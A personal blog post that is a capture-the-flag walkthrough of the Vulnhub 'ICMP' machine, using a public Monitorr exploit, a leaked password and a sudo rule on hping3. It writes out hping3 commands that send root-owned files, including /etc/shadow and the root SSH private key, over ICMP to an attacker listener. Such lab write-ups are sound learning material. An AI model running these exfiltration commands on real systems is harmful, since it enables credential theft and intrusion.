---
layout: post
title:  "Update March 24"
date:   2021-03-24 21:30:00 +1100
category: hacking
---

## Update
I haven't written a post for a bit; been feeling a bit burned out. Still doing *something* productive every day - no zero days.

What have I done since I last wrote?

1. HTB Time. This is an active machine, so no writeup just yet.
2. THM Vulnet. This is basically Shuriken from Vulnhub. I haven't written it up and I probably won't, even though I quite liked it.
3. Vulnhub ICMP.

I had a quick go at Vulnhub Crossroads and didn't like it. It's a webpage ripped from what appears to be a real drug/alcohol rehab facility. Way to stay classy.

## ICMP Foothold
This thing runs *Monitorr* 1.7.6 which has multiple vulns; the python exploit from Searchsploit works.

## User Fox
We are www-data but we can read a file belonging to *fox* called reminder. It says:

>crypt with crypt.php: done, it works  
work on decrypt with crypt.php: howto?!?

There is a directory called *devel* but we can't do a listing. We intuit that crypt.php is in devel, and we can read it; it contains the password for Fox.

## Privesc (sort of)
{% highlight shell %}
$ sudo -l
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
{% endhighlight %}

This was a little new to me. I've done a hping3 privesc before where you just run the binary with no arguments; this gets a command prompt we can use to launch a shell. In this case, we have to have an argument. The argument is a host. 

I make a new directory and touch a file:

``
touch 192.168.1.186
``

Now when I run:

``
sudo -u root /usr/sbin/hping3 --icmp *
``

it pings my box. We can exfil files. Local machine:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/icmp]
└─# hping3 --listen 192.168.1.190 -I eth0 --sign MSGID1  
{% endhighlight %}

Remote machine:

{% highlight shell %}
$ sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 150 -c 1 --file /root/proof.txt
HPING 192.168.1.186 (enp0s3 192.168.1.186): icmp mode set, 28 headers + 150 data bytes
[main] memlockall(): Operation not supported
Warning: cant disable memory paging!
len=178 ip=192.168.1.186 ttl=64 id=24284 icmp_seq=0 rtt=8.3 ms

--- 192.168.1.186 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 8.3/8.3/8.3 ms
{% endhighlight %}

And we get:

{% highlight shell %}
9377e773846aeabb51b37155e15cf638
{% endhighlight %}

We can also use this to exfil the shadow file:

``
sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 9999 -c 1 --file /etc/shadow
``

We can also use it to exfil the SSH private key:

``
sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 1000 -c 3 -i 5 -u --file /root/.ssh/id_rsa
``

However, at the moment it keeps telling me the key is in an invalid format, even though it looks okay. So, yeah.
